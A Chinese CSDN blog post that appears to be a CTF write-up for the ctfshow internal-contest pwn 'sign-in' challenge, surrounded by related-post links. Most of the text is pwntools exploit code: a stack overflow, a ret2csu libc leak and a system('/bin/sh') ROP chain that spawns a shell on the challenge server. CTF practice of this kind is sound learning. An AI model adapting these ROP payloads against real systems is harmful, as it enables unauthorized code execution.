ctfshow 内部赛 pwn 签到题

最新推荐文章于 2024-07-24 21:54:25 发布
最新推荐文章于 2024-07-24 21:54:25 发布
阅读量1.6k 收藏 1
点赞数 4
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SCP000111/article/details/121353677
版权

ctfshow 内部赛 pwn 签到题

找了在刷题的中,不会做这道题,找了好久没找到wp,搞了几天,还怀疑题目出错了,结果一看有最近13天前做出来的,又认真在搞。最终搞出来了,原来是csu,不想让后来人向我一样没有wp可以看,解出来马上就写了博客hhhh。

在这里插入图片描述

先放图片,2021.11.16该代码可行

这个我找了好久。都没找到wp,但是我看到了一个人的博客,无意间发现他的题目似乎与这道题一样,于是尝试求解,解出,在这里感谢下作者。这里 作者是偏有宸机,他那里有更好的解释。Ret2libc_64[csu及gets写bss段] 之前用常规的write函数泄露ROP出现问题,以及 这里 的博客与 这里 的博客exp不知为何我这里无法使用(可能题目更新了)

代码如下(没用的注释删掉就好了hhhh)

#!/usr/bin/env python
# encoding: utf-8
'''
from pwn import*
from LibcSearcher import *
context.log_level = "debug"
r = remote('pwn.challenge.ctf.show',28098)
#r=process('./ret2libc_64')
elf = ELF('./ret2libc_64')
puts_plt=elf.plt['write']
puts_got=elf.got['gets']
main=elf.sym['main']
print(hex(main))
'''

pop_rdi=0x0004006c3
pop_ret=0x0004004a9
'''
rsi_r15 = 0x00000000004006c1
payload='a'*160+'a'*8+p64(pop_rdi)+p64(1)+p64(rsi_r15)+p64(puts_got)+p64(0)+p64(puts_plt)+p64(main)

r.recvuntil('now,Try Pwn Me?\n')

r.sendline(payload)

#r.recvuntil('now,Try Pwn Me?\n')
puts_addr = u64(r.recv(6).ljust(8, '\x00'))#ok
#puts_addr = u64(r.recv(7).ljust(8, '\x00'))#?
#puts_addr = u64(r.recvuntil('\n')[:-1].ljust(8,'\x00'))#?
#puts_addr = u64(r.recvuntil('\x7f')[-6:].ljust(8, '\x00'))#ok
'''
from pwn import *
from LibcSearcher import *
context.log_level = 'debug'
sh = process('./ret2libc_64')
sh = remote('pwn.challenge.ctf.show',28098)
elf = ELF('./ret2libc_64')
#libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
#libc = ELF('../../tools/libc-database/db/libc6_2.23-0ubuntu10_amd64.so')
context.log_level = 'debug'
context.terminal = ['tmux','splitw','-h']
gadgets1 = 0x00000000004006B6
gadgets2 = 0x00000000004006A0
write_got = elf.got['write']
main_addr = elf.symbols['main']
offset = 'a'*168
def csu(r12,r13,r14,r15,ret_addr):
    payload = offset
    payload += p64(gadgets1)
    payload += "b"*8
    payload += p64(0)
    payload += p64(1)
    payload += p64(r12)
    payload += p64(r15)
    payload += p64(r14)
    payload += p64(r13)
    payload += p64(gadgets2)
    payload += "c"*56
    payload += p64(ret_addr)
    sh.sendline(payload)
sh.recvuntil("Pwn Me?\n")
csu(write_got,1,write_got,8,main_addr)
write_addr = u64(sh.recv(8))
print "write:",hex(write_addr)

#print(hex(puts_addr))

libc=LibcSearcher('write',write_addr)#libcsearcher
libcbase=write_addr-libc.dump('write')
system_addr=libcbase+libc.dump('system')
bin_sh_addr=libcbase+libc.dump('str_bin_sh')

'''
libc_puts=0x0809c0
libc_sys=0x04f440
libc_bin=0x1b3e9a
offset = puts_addr - libc_puts#libcsearcher无法使用时
system_addr=offset+ libc_sys
bin_sh_addr=offset+ libc_bin
'''
payload='a'*160+'a'*8+p64(pop_rdi)+p64(bin_sh_addr)+p64(system_addr)
#payload='a'*160+'a'*8+p64(pop_ret)+p64(pop_rdi)+p64(bin_sh_addr)+p64(system_addr)#这个pop_ret是栈对齐的东西
sh.recvuntil('now,Try Pwn Me?\n')
sh.sendline(payload)
sh.interactive()
'''
from pwn import *
from LibcSearcher import *
io = remote('pwn.challenge.ctf.show',28092)
elf = ELF('./ret2libc_64')
context.log_level = 'debug'

rdi = 0x00000000004006c3
rsi_r15 = 0x00000000004006c1
main = 0x4005FD
payload = 'a'*0xa0+'a'*0x8 + p64(rdi) + p64(1)+p64(rsi_r15)+p64(elf.got['write'])+p64(0)+p64(elf.plt['write'])+p64(main)
io.sendline(payload)
leak = u64(io.recvuntil('\x7f')[-6:].ljust(8,'\x00'))
libc = LibcSearcher('write',leak)
offset = leak - libc.dump('write')
system = offset + libc.dump('system')
binsh = offset + libc.dump('str_bin_sh')
payload = 'a'*0xa0+'a'*0x8 + p64(rdi)+p64(binsh)+p64(system)
io.recvuntil('Me?\n')
io.sendline(payload)
io.interactive()
'''
Steins;G4te
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
warmup pwn入门
02-11
pwn入门
welpwn pwn 入门
02-11
pwn 入门
ctfshow-内部-签到
XYH_233的博客
03-30 1277
ctfshow-内部-签到
【CTFshow】——PWN签到
IronmanJay的博客
08-15 920
PWN签到-nc pwn.challenge.ctf.show 28171
【CTF Pwn】CTFShow PWN签到 Writeup(nc)
HEX9CF的技术博客
04-29 602
1PWN签到
ctfshow-内部-签到_ctfshow内部签到(1),网络安全面试试
2401_84164527的博客
04-09 766
​ 有三个界面,login.phpuser.php,首先关注到的是,SQL语句,发现有两处可以看到通过email和password选出username,而,那么大概率从此处入手。
CTFSHOW 签到
MrTreebook的博客
12-05 1068
CTFSHOW 萌新 签到1.目下载地址2. checksec检查保护3.IDA分析4.构造ROP链4.exp 1.目下载地址 点击下载目 2. checksec检查保护 堆不可执行 3.IDA分析 看到了gets()函数,很明显存在溢出 需要知道64位系统和32位系统的区别 64 位系统传参从第一个到第六个依次保存在rdi,rsi,rdx,rcx,r8,r9 从第7个参数开始,接下来的所有参数都才通过栈传递 4.构造ROP链 我们需要找到合适的 gadgets,利用 ROPgadget a
PWN-PRACTICE-CTFSHOW-3
P1umH0的博客
01-13 551
PWN-PRACTICE-CTFSHOW-3pwn10萌新-签到萌新-数学99内部-签到 pwn10 格式化字符串漏洞,覆写num为16即可打印出flag # -*- coding:utf-8 -*- from pwn import * context.log_level="debug" #io=process("./pwn1") io=remote("pwn.challenge.ctf.show",28045) elf=ELF("./pwn1") #gdb.attach(io,"b * 0x0
内部 签到-ctf.show
yuqie的博客
06-14 377
这结果可是跑了好几个网站才出来,观察一下上面的图案,是十二星座,网上科普一下。的字符编码(xx等于该字符在字符集表里面的编码的16进制数字)。天秤座 ♎ U+264E(9月23日 - 10月23日)金牛座 ♉ U+2649(4月21日 - 5月21日)双子座 ♊ U+264A(5月22日 - 6月21日)巨蟹座 ♋ U+264B(6月22日 - 7月22日)狮子座 ♌ U+264C(7月23日 - 8月22日)处女座 ♍ U+264D(8月23日 - 9月22日)
ctfshow pwn学习笔记
Scarehehe的博客
11-30 5935
文章目录pwn入门pwn签到pwn02 ctfshow pwn学习笔记(除堆部分)本菜逼不会堆 pwn入门 pwn签到 nc 直接连 pwn02 查看保护 进入pwnme函数 发现fgets处存在栈溢出,s距离ebp为0x9,那么覆盖到返回地址的长度还要再加上0x4我是懒狗,没有gdb看,且程序中存在后门函数,地址为0x804850f exp: from pwn import * io = process("./stack") payload = b"a"*(0x9+0x4)+p32(0x804
pwn1 一道pwn练习
05-07
pwn练习
一道pwn入门的练习
10-23
直接以一个非常简单的栈溢出例子(基于Linux)来讲解pwn所要用到的一些常用的工具及命令的用例
forgot pwn 入门
02-11
pwn 入门
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 443
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
构建稳固与安全的网络环境:从微软蓝屏事件中的教训学习
xingyu_qie的专栏
07-22 646
微软蓝屏”事件为我们提供了宝贵的教训和警示,即使是最大的科技公司也难以完全避免软件缺陷带来的灾难性后果。建设一个稳固和安全的网络环境需要多方面的努力:从有效的软件更新管理到强化的紧急响应能力,再到全员安全意识的培养和文化建设。只有综合运用技术、流程和人员培训,我们才能更好地应对未来可能出现的类似挑战,保护我们的数字基础设施和社会运行的稳定性与安全性。
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1089
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
大坝安全监测设备有哪些主要功能?
yyth13276363312的博客
07-24 323
12。3. **实时预警和报警处理**:提供精准的安全预警信息,及时处理可能的危险情况12。1. **实时监测大坝的各项物理参数**:包括应变、位移、水位、流量等12。6. **环境量监测**:包括上/下游水位、气温、降水量等11
第124天:内网安全-代理 Sockets协议&路由不出网&后渗透通讯&CS-MSF 控制上线
最新发布
weixin_71529930的博客
07-24 905
这里访问页面可以访问成功但是ping不通,个人理解是通过win2019开的口子,能与win2008建立通讯,http不需要建立持久的连接,连接之后返回数据断开即可,通过win2019把数据反回来,而ping虽然数据包可以发送出去,但是在win2008并未设置到kali的路由不知道往哪里发送所以会卡住。你需要编辑这个文件来添加你的代理服务器信息。这个时候如果是msf与他建立了完整的连接,如果需要kali主机与他们建立连接,则需要通过socket连接生成节点,通过代理连接这个节点以此访问,代理端口为1111。
ctfshow 内部签到
08-28
很抱歉,根据提供的引用内容,我无法给出关于"ctfshow 内部签到"的相关信息。引用提到了一个篮球观众签到表的Excel模板下载,引用和则提到了关于刷和解的内容。请提供更多信息或明确问,我将尽力帮助您。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [篮球观众签到表](https://download.csdn.net/download/weixin_38676058/13995534)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] - *2* *3* [ctfshow 内部 pwn 签到](https://blog.csdn.net/SCP000111/article/details/121353677)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_2"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Steins;G4te

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值